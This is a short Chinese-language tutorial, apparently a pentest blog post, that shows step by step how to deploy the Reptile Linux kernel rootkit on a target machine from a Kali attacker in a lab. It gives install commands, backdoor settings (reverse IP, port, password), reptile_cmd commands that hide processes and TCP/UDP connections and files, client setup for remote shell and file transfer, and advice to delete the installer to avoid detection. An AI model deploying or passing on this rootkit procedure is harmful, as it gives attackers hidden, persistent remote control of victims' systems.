## 项目地址
https://github.com/f0rb1dd3n/Reptile
## 安装
apt-get install linux-headers-$(uname -r)
git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./setup.sh install
## 卸载
./setup.sh remove
这里来说明一下,安装和卸载都是在渗透目标机器上进行的,需要交互式 shell。下面我以 ubuntu 作为渗透测试目标 kali 作为攻击机器来演示一下如何使用。
### on vulnerable ubuntu(192.168.5.148)
和 msf 生成木马比较类似 Reverse IP 是 kali 的 ip,Reverse Port 是 反弹到 kali 的端口,SRC port 是本地接收数据包的端口 Backdoor password 是我们后门的密码。最后提示是否删除这个项目,实战下肯定是要删除的,因为这个客户端和服务端安装都是一个 setup.sh 被发现会被卸载掉,这里我自己的机器就不删了。
看下 rootkit 效果,没有进程,没有连接。
隐藏进程: /reptile/reptile_cmd hide <pid>
显示进程: /reptile/reptile_cmd show <pid>
隐藏udp: /reptile/reptile_cmd udp <IP> <port> hide
显示udp: /reptile/reptile_cmd udp <IP> <port> show
隐藏tcp: /reptile/reptile_cmd tcp <IP> <port> hide
显示tcp: /reptile/reptile_cmd tcp <IP> <port> show
还可以隐藏文件 所有包含 reptile 这个字符的文件会被隐藏,这个字符可以在配置文件中修改。
### on attacker kali(192.168.5.149)
## 安装控制端
./setup.sh client
安装好以后配置相关参数
这是候已经连接上了,可以看到可以上传下载和获得一个 shell